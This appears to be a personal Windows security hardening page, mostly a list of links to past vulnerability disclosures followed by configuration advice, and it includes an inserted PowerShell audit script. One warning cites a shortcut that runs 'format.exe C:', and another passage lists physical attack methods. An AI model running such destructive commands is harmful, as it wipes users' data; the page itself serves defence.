http://www.kb.cert.org/vuls/id/529673
- MSRC-001: Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability
http://lists.grok.org.uk/pipermail/full-disclosure/2010-July/075423.html
- Microsoft Help Files (.CHM): 'Locked File' Feature Bypass
http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075294.html
- Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
http://lists.grok.org.uk/pipermail/full-disclosure/2010-January/072549.html
- 0day vulnerability Sogou input method to obtain system privileges
http://www.securityfocus.com/archive/1/508990
- Windows Update (re-)installs outdated Flash ActiveX on Windows XP
http://www.securityfocus.com/archive/1/502819
- Windows 7 - not so secure ?
http://isc.sans.edu/forums/diary/5767
Sacrificing security for usability: UAC security flaw in Windows 7 beta (with proof of concept code)
http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/
Microsoft to Address UAC Security Concerns in Next Release of Windows 7 Beta
http://www.sans.org/newsletters/newsbites/xi/11#310
- Microsoft Windows CHM File Processing Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/33204
- Microsoft VISTA TCP/IP stack buffer overflow
http://www.securityfocus.com/archive/1/498471
- Token Kidnapping Windows 2003 PoC exploit
http://www.securityfocus.com/archive/1/497168
- [Wired Security/EOF] Disable Windows Defender (Vista) PoC code
http://lists.grok.org.uk/pipermail/full-disclosure/2008-May/062313.html
- iDefense Security Advisory 05.12.08: Microsoft Windows I2O Filter Utility Driver (i2omgmt.sys) Local Privilege Escalation Vulnerability
http://lists.grok.org.uk/pipermail/full-disclosure/2008-May/062275.html
- Microsoft Windows XP SP2/2003 - Macrovision SecDrv.sys privilege escalation (0day)
http://www.securityfocus.com/archive/1/482482
- Need to upgrade DirectX:
iDefense Security Advisory 07.18.07: Microsoft DirectX RLE Compressed Targa Image File Heap Overflow
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064727.html
- Windows Vista: Non-privileged code can redirect shortcuts to intercept privilege elevation requests
http://www.securityfocus.com/archive/1/468533
- Heap Overflow Flaw Reported in Windows Help
http://www.sans.org/newsletters/newsbites/ix/30#304
Microsoft Windows Help File Unspecified Heap Overflow Vulnerability
http://www.securityfocus.com/bid/23382
- US Government Secure Configuration Mandate Helps Everyone
http://www.sans.org/newsletters/newsbites/ix/30#200
An Explanation of OMB's Security Mandate
http://blogs.govexec.com/techinsider/archives/2007/04/post_6.html
The Chink in OMB's Windows Mandate
http://blogs.govexec.com/techinsider/archives/2007/03/is_that_windows_system_safe.html
- [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
http://www.securityfocus.com/archive/1/464148
- Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053143.html
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053145.html
- Exploiting Microsoft dynamic Dns updates
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053134.html
- [Reversemode Advisory] Microsoft Windows Ndistapi.sys IRQL escalation
http://www.securityfocus.com/archive/1/463208
- WGA Always Sends Info to Microsoft
http://www.sans.org/newsletters/newsbites/ix/21#305
- Microsoft Windows Explorer fails to properly handle malformed OLE documents
http://www.kb.cert.org/vuls/id/194944
Microsoft Windows OLE32.DLL Word Document Handling Denial Of Service Vulnerability
http://www.securityfocus.com/bid/22847
- Windows Shell User Logon ActiveX Control Unauthorized User Creation
http://www.securityfocus.com/bid/22710
- Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052613.html
- Issue regarding Windows Vista Speech Recognition
http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx
- Defeating Microsoft Office Genuine Advantage (OGA) Check
http://lists.grok.org.uk/pipermail/full-disclosure/2007-January/052085.html
- Microsoft Help Workshop .CNT contents files buffer overflow vulnerability
http://www.securityfocus.com/archive/1/457210
Help project files (.HPJ) buffer overflow vulnerability in Microsoft Help Workshop
http://www.securityfocus.com/archive/1/457436
- Windows logoff bug possible security vulnerability and exploit.
http://www.securityfocus.com/archive/1/457167
http://www.securityfocus.com/archive/1/457807
- AusCERT Alert AL-2006.0102 -- Microsoft Windows Kernel GDI Local Privilege Escalation
http://www.auscert.org.au/6942
- Exploit Code Can Disable the Windows Firewall
http://www.sans.org/newsletters/newsbites/viii/87#204
- An analysis of Microsoft Windows Vista's ASLR
http://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049722.html
- Microsoft Vista's IPv6: Dangerous Information Leak?
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/049066.html
SLAAC Attack - 0day Windows Network Interception Configuration Vulnerability
http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080096.html
- Microsoft Updates WGA Notifications
http://www.sans.org/newsletters/newsbites/viii/52#311
Defeating Microsoft WGA Validation Check
http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/034242.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/034255.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-July/035613.html
- How to break Windows Notepad
http://blogs.msdn.com/michkap/archive/2006/06/14/631016.aspx
Non-security, useless, but cute...
- Windows Software Restriction Policy Protection Bypass
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046719.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046735.html
Circumventing Group Policy as a Limited User
http://www.sysinternals.com/blog/2005/12/circumventing-group-policy-as-limited.html
- [48Bits.com Advisory] Path conversion design flaw in Microsoft NTDLL
http://www.securityfocus.com/archive/1/433583
- [Reversemode] Microsoft Infotech Storage library Heap Corruption
http://www.securityfocus.com/archive/1/433435
- Windows XP Home LSA secrets stores XP login passphrase in plain text
http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/045800.html
- Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045079.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045084.html
http://www.securityfocus.com/archive/1/431032
- Windows Help Heap Overflow
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044748.html
http://www.securityfocus.com/archive/1/430871
Microsoft Help (WINHLP32.EXE) - Multiple Remote Code Execution and Denial Of Service Vulnerabilities
http://www.securityfocus.com/archive/1/443034
http://www.securityfocus.com/archive/1/443039
- Microsoft Investigates HTML Help Flaw Warning
http://www.eweek.com/article2/0,1895,1920601,00.asp
Security Advisory B008 - Microsoft HTML Help Workshop .hhp File Processing Buffer Overflow Lets Remote User Execute Arbitrary Code
http://users.pandora.be/bratax/advisories/b008.html
- Windows Access Control Demystified.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-January/041877.html
(Partially?) fixed in
MS06-011.
- [ImpersonateNamedPipeClient] Question for the Windows pros
http://lists.grok.org.uk/pipermail/full-disclosure/2006-January/041569.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-January/041587.html
The Weakness of Windows Impersonation Model
http://www.securityfocus.com/archive/1/434151
- Bypass user GPO in Windows Xp / 2003
http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/040444.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/040448.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/040461.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/040479.html
- -Exploiting Freelist[0] On Windows XP Service Pack 2-
http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/039683.html
- Miscrosoft Registry Editor 5.1/XP/2K long string key vulnerability
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/036448.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/036461.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/036468.html
- hidden users on windows?
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035731.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035748.html
- Microsoft ActiveSync information leak and spoofing
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035703.html
Microsoft ActiveSync Remote Password Compromise
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035706.html
- Microsoft Windows NTFS Information Disclosure
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034787.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034812.html
- Useless tidbit [MS AntiSpyware, program.exe trick]
http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/033909.html
iDEFENSE Security Advisory 11.15.05: Multiple Vendor Insecure Call to CreateProcess() Vulnerability
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789.html
Window's O/S [IE notepad.exe in Desktop]
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/039095.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/039109.html
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/039116.html
Insecure call to CreateProcess()/CreateProcessAsUser() [IE telnet]
http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/046212.html
- HKLM locking
http://www.securityfocus.com/archive/1/388517
- [ Positive Technologies ] Defeating Microsoft Windows XP SP2 Heap protection
http://lists.grok.org.uk/pipermail/full-disclosure/2005-January/031292.html
- Microsoft Windows winhlp32.exe Heap Overflow Vulnerability
http://www.securityfocus.com/archive/1/385332
Microsoft Windows LoadImage API Integer Buffer overflow
http://www.securityfocus.com/archive/1/385342
- Desktop.ini flaw results in executing folders
http://www.securityfocus.com/archive/1/363590
- Microsoft's Explorer and Internet Explorer long share name buffer overflow.
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020526.html
The referenced
http://support.microsoft.com/kb/322857
says this is fixed in W2kSP4 and WXPSP1; but, as the following show, it is in
fact not fixed in either:
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020545.html
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020631.html
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020644.html
Beware: this bug is remotely (web, email) exploitable to run
arbitrary code (no public references yet).
- Windows XP explorer.exe heap overflow [EMF, WMF image loading]
http://www.securityfocus.com/archive/1/354783
http://www.securityfocus.com/archive/1/354844
http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017756.html
http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017761.html
http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017772.html
http://www.securityfocus.com/archive/1/355082
http://www.securityfocus.com/archive/1/355388
- HTML Help API - Privilege Escalation
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012638.html
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012667.html
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012713.html
- Process Killing - Playing with PostThreadMessage
http://www.securityfocus.com/archive/1/339947
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/011296.html
- Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
http://www.securityfocus.com/archive/1/321301
http://www.securityfocus.com/archive/1/321557
http://www.securityfocus.com/archive/1/321602
This seems not to affect W2k, but WXP only.
- Win32: Postmessage API security flaw
http://www.securityfocus.com/archive/1/315061
- SECURITY.NNOV: Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS
http://www.securityfocus.com/archive/1/311359
- Opentype font file causes Windows to restart.
http://www.securityfocus.com/archive/1/305382
http://www.securityfocus.com/archive/1/305407
http://www.securityfocus.com/archive/1/305679
http://www.securityfocus.com/archive/1/305904
http://www.securityfocus.com/archive/1/307051
This is "just" a DoS (against most Windows versions, not only W2k),
until someone makes this into an execute-my-code exploit.
- Windows File Protection Old Security Catalog Vulnerability
http://www.securityfocus.com/archive/1/304481
Windows File Protection Arbitrary Certificate Chain Vulnerability
http://www.securityfocus.com/archive/1/304480
- Execution Rights Not Checked Correctly For 16-bit Applications
http://www.securityfocus.com/archive/1/292260
- White paper: Exploiting the Win32 API.
http://www.securityfocus.com/archive/1/286185
http://www.securityfocus.com/archive/1/286272
http://www.securityfocus.com/archive/1/286308
http://www.securityfocus.com/archive/1/286679
http://www.securityfocus.com/archive/1/286861
http://www.securityfocus.com/archive/1/286868
Other example (exploit) code:
http://www.packetstormsecurity.nl/filedesc/GetAd.c.html
See also:
- SECURITY.NNOV: Windows 2000 system partition weak default permissions
http://www.securityfocus.com/archive/1/286260
Default NTFS Permissions in Windows 2000
http://support.microsoft.com/kb/244600
Windows 2000 Default Permissions Could Allow Trojan Horse Program (Q327522)
http://technet.microsoft.com/security/bulletin/ms02-064
- DebPloit (exploit)
http://archives.neohapsis.com/archives/ntbugtraq/2002-q1/0172.html
http://www.securityfocus.com/archive/1/264441
http://www.securityfocus.com/archive/1/264927
- Elevation of privileges with debug registers on Win2K
http://www.guninski.com/dr07.html
- Double clicking on innocent looking files may be dangerous
http://www.guninski.com/clsidext.html
- Double clicking on MS Office documents from Windows Explorer may execute
arbitrary programs in some cases
http://www.guninski.com/officedll.html
http://www.securityfocus.com/archive/1/276755
- ... Also local Administrator compromise at least on default Windows 2000
http://www.guninski.com/ieshelldefview.html
I fail to see how Windows 2000 got "Common Criteria" certification. Maybe
because they assume a "friendly" network and "cooperating" users ... but
isn't any computer secure under those circumstances?
Reference(s):
Use Firefox, Thunderbird
Use Firefox (browser) and Thunderbird (mail client), and keep them updated to
the latest version. Mozilla is actively maintained, free of old known bugs.
As mentioned above: turn Java off in Tools > Options > Content.
Reference(s):
Netscape Navigator has reached End of Support and they recommend using
Firefox. Or you may want to use Chrome or Opera or Safari (all have security
problems, I just do not keep track of those).
Use Acrobat DC
There are vulnerabilities in older Acrobat Reader versions; use Acrobat
Reader DC, kept updated: see
http://get.adobe.com/reader/otherversions
(and FTP site).
BEWARE: PDF files may carry active content, so are also dangerous. In
Edit > Preferences set:
- JavaScript: do not Enable Acrobat JavaScript
- Multimedia Trust: do not Allow multimedia operations
- Security (Enhanced)
  - Enable Protected Mode at startup
  - Protected View: All files
  - Enable Enhanced Security
  - no Privileged Locations, do not automatically trust documents or sites
- Trust Manager
  - do not Allow opening of non-PDF file attachments with external applications
  - Internet Access from PDF Files outside the web browser: (Change Settings) Block all web sites
See also the
NSA "Recommendations for Configuring Adobe Acrobat Reader DC in a Windows Environment".
Reference(s):
Third party software
Need to keep various other third party software updated. See sub-sections on
Java, messengers (AIM, MSN, YIM, ICQ, mIRC, Skype) and media players
(RealPlayer, Winamp, Windows Media Player, QuickTime, Flash).
The list here is not exhaustive but only the common software I knew
about; and is not in order of importance. Some third party software
(IE, Firefox, MSWord, Acrobat, Eudora) is singled out elsewhere.
Java (or latest) needs to be kept up-to-date (and/or removed and/or disabled
in the browser).
Reference(s):
There are vulnerabilities in AIM (AOL Instant Messenger).
Reference(s):
Do not use MSN Messenger as it has privacy problems (combine that with
cross-site-scripting problems on MS sites...); servers are misconfigured;
and it can be hijacked.
Reference(s):
Need to update YIM.
Reference(s):
Need to update ICQ.
Reference(s):
Need to update mIRC.
Reference(s):
Vulnerabilities have been found in Skype, and you should update the software.
Reference(s):
Vulnerabilities have been found in RealPlayer, and you should update the
software.
Reference(s):
Vulnerabilities have been found in Winamp, and you should update the software.
Reference(s):
Windows Media Player seems to have security problems: it will run a WMA or
WMF file as such, even when renamed; and even though it is not the default
MP3 player. Use e.g. RealPlayer or Winamp instead, and un-install WMP. Note
also that both WMP and RealPlayer may be "tricked" via files named WAV or
MP3 that in fact contain something else.
Reference(s):
Should un-install Apple QuickTime Player: no longer supported or needed on
Windows.
Reference(s):
Upgrade Flash and Shockwave players; or remove them altogether...
Reference(s):
Beware of long filenames
Long filename extensions: no patch or workaround yet (thankfully no remote
exploit either). Explorer crashes, probably exploitable as a buffer
overflow encoded into the extension.
Reference(s):
Long NTFS filenames: some software packages (Windows Explorer and CMD.EXE
included) may not be able to access long NTFS pathnames.
Reference(s):
Disable WSH, VBS, CHM, Scrap
WSH is Windows Script Host. To disable, rename the relevant files; or for
Windows 98, un-install it: select Start Menu > Settings > Control Panel >
Add/Remove Programs > Windows Setup tab > Accessories and make sure
Windows Scripting Host is deselected (no checkmark).
Reference(s):
Delete VBS VBScript (Visual Basic) Script File from the registered File Types
list, or use regedit to clobber the command to open them, or rename the
software so it is not accessible. (VBS files may not be listed after you
disabled WSH.) Delete VBE VBScript Encoded Script File also. Other file types
(such as REG files) may also be dangerous, and can be removed/clobbered for a
more secure system.
Reference(s):
Delete CHM Compiled HTML file from the registered File Types list, or clobber
the command with regedit, or rename the software so it is not accessible.
Note that there are CHM files in C:\windows\help\ which you may then not be
able to use.
Reference(s):
To disable scrap files, alter or remove File Types SHS and SHB, or clobber the
command shscrap.dll with regedit, or rename the software so it is not
accessible.
Reference(s):
Un-hide file types
Make Windows show all file types (extensions): EXE files, scrap files,
VBS scripts, PIF and LNK file attachments ... (sent by email?).
- Set Windows option: in Windows Explorer (e.g. double-click
My Computer), select Tools >
Folder Options > View tab, and disable the
Hide file extensions for known file types option (ensure it is
un-checked); Apply, then set all Like Current Folder.
- Use regedit to search for the value "NeverShowExt", and consider renaming
each occurrence to "AlwaysShowExt". (You may be reluctant to also do lnkfile
or piffile, as then your Desktop and Start Menu will look ugly. But they are
also dangerous: a file called neatinfo.txt.lnk or .pif could point to
"C:\dos\format.exe C:", and in fact some viruses propagate by email as
"hidden" .pif and .lnk files.)
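As an added example (my own script, not from this page), the following PowerShell audits the registrations that this section and the "Disable WSH, VBS, CHM, Scrap" section discuss: for each listed extension it reports the ProgID, the shell open command and whether NeverShowExt is set, and with -UnhideExtensions renames NeverShowExt to AlwaysShowExt. It assumes Windows PowerShell 5.1 or later run as Administrator; the extension list, handler patterns and status labels are my own choices.

```powershell
# Added example, not from the original page: audit the file-type registrations
# the page says to disable (VBS, VBE, CHM, SHS, SHB, REG) or un-hide (LNK, PIF).
# Read-only unless -UnhideExtensions is given, which renames NeverShowExt to
# AlwaysShowExt as the page suggests. Assumptions: Windows PowerShell 5.1 or
# later, run as Administrator (HKEY_CLASSES_ROOT is writable only then).
# Supports -WhatIf so the rename can be previewed first.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$UnhideExtensions,   # rename NeverShowExt -> AlwaysShowExt
    [switch]$IncludeShortcuts    # also un-hide .lnk/.pif (page: Desktop gets ugly)
)

$hkcr       = 'Registry::HKEY_CLASSES_ROOT'
$extensions = '.vbs', '.vbe', '.chm', '.shs', '.shb', '.reg', '.lnk', '.pif'
$shortcuts  = '.lnk', '.pif'

# Handlers that mean the type is still "live": script host, HTML Help viewer,
# scrap-object unpacker, registry editor (assumed patterns).
$liveHandler = 'wscript|cscript|hh\.exe|shscrap|regedit'

$report = foreach ($ext in $extensions) {
    # HKCR\<ext> (Default) holds the ProgID, e.g. "VBSFile"; no key = type deleted.
    $progId = (Get-ItemProperty -Path "$hkcr\$ext" -ErrorAction SilentlyContinue).'(default)'
    if (-not $progId) {
        [pscustomobject]@{ Extension = $ext; ProgId = '-'; Hidden = $false
                           Status = 'unregistered'; Command = '' }
        continue
    }
    $progKey = "$hkcr\$progId"
    $command = (Get-ItemProperty -Path "$progKey\shell\open\command" `
                                 -ErrorAction SilentlyContinue).'(default)'
    # NeverShowExt present => Explorer hides the extension even when "hide
    # extensions for known file types" is off; that is how neatinfo.txt.lnk
    # passes as a text file.
    $hidden = $null -ne (Get-ItemProperty -Path $progKey -Name NeverShowExt `
                                          -ErrorAction SilentlyContinue)

    if ($hidden -and $UnhideExtensions -and ($IncludeShortcuts -or $ext -notin $shortcuts)) {
        if ($PSCmdlet.ShouldProcess($progKey, 'Rename NeverShowExt to AlwaysShowExt')) {
            Rename-ItemProperty -Path $progKey -Name NeverShowExt -NewName AlwaysShowExt
            $hidden = $false
        }
    }

    $status = if ($command -match $liveHandler) { 'handler active' }
              elseif ($command)                 { 'custom handler' }
              else                              { 'command clobbered' }
    [pscustomobject]@{ Extension = $ext; ProgId = $progId; Hidden = $hidden
                       Status = $status; Command = $command }
}

$report | Format-Table -AutoSize
```

Save it as a .ps1 file and run it first with -WhatIf to see which keys would be renamed; a row reading "handler active" with Hidden = True is the combination the two sections above warn about.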
Miscellaneous settings
You may want to be careful with what "legit" software you install. In
particular, you may want to turn off autoplay on your CD drive (as
mentioned above).
Reference(s):
Under Win2k/NT, a user can lock files so that no other user can access
them. (This may include logon scripts and files to set security policies...)
This is a Windows design "feature", with no fix planned. (Or, are "group
policies" but not logon scripts et al, fixed in
MS02-016??)
Reference(s):
Though not security issues, Microsoft should not be rude to its
competitors, should not engage in software piracy nor infringe patents.
Reference(s):
Physical security
I seem to have neglected physical security. Generally, once an attacker
has access to the keyboard/screen of your computer, he can do any "bad
things" he likes. Seems that Windows was designed as a single-user
machine, the paradigm of "the user is king", with any "security" an
after-thought slap-on.
- With Win98, one used to be able to simply press "cancel" at the login
prompt; Win11 allows a "trick" to recover a lost password.
- Boot into "safe mode" and bypass some restrictions. Set Windows to
ignore the "boot-interrupt" (F5 or F8?) keys.
- Boot from CD or USB and do anything to the hard disk. Most BIOS (the
boot program on the motherboard, usually accessed by hitting the
DELete key soon after power-on) have password features to prevent
this.
- Remove your hard disk and use another computer to retrieve or alter
data, then put it back in place. Disk encryption may help to protect.
- Install a keystroke logger (inline into the keyboard cable) to retrieve
any passwords.
- Use Firewire (or Thunderbolt/LightPeek) to access system memory
(including running any code).
- Eavesdrop on radiation emitted by your computer or keyboard. Beware
particularly of wireless/bluetooth keyboards and mice, some may be read
or impersonated.
You may need to have your computer room locked with a key.
Reference(s):
Recover from compromise
If your PC has been compromised (e.g. infected with some virus), and you
would like to return it to a safe state, then you really should re-install
it from scratch: re-format the hard disk and re-install Windows and
all software, from safe media (e.g. original CDs).
If it had been infected with a "known virus" then maybe your anti-virus
product can clean it up. However, can you be sure that was the only
compromise: that there were no other as-yet-undetected viruses, or maybe
some specific (personally directed) malware lurking?
You need to secure your newly installed PC before first connecting it to the
internet (e.g. to read these instructions on how to keep it secure, or to
use WindowsUpdate): at the height of the Blaster and Sasser worms,
unprotected PCs were infected within a minute of connection. Print out these
instructions, then re-format and re-install everything, and configure things
to keep safe.
Disclaimer
Only Windows PCs are considered here. I do not keep track of Mac or MacOSX
or of UNIX or Linux issues. - I only care about two or three kinds of
Windows PC:
- My home PCs. First had one with Windows98, upgraded to Windows2000
then WindowsXP; now have Windows7 also; they (and my Ubuntu machine)
are networked to cable broadband via a router/firewall.
- PCs in computer labs and offices at work: with Windows XP, to log into
and be controlled by a Samba server. (We have many Debian Linux servers
and office machines also.)
Only issues of relevance to my setups are listed, some generalities
first, then in apparently random order. Advice here may not be
applicable to some Windows versions or other configurations. In
particular I blissfully ignore IIS and SQL.
There are many security issues not covered here, either because I never
knew about them, or because I did not think they were relevant to my
setups. Do not rely solely on my advice. Conversely, following any advice
here may render your computer inoperable. Use at your own risk. - Please
let me know if I missed something obvious, or if any of the advice above
gave you trouble.
Paul Szabo
psz@maths.usyd.edu.au
28 Oct 24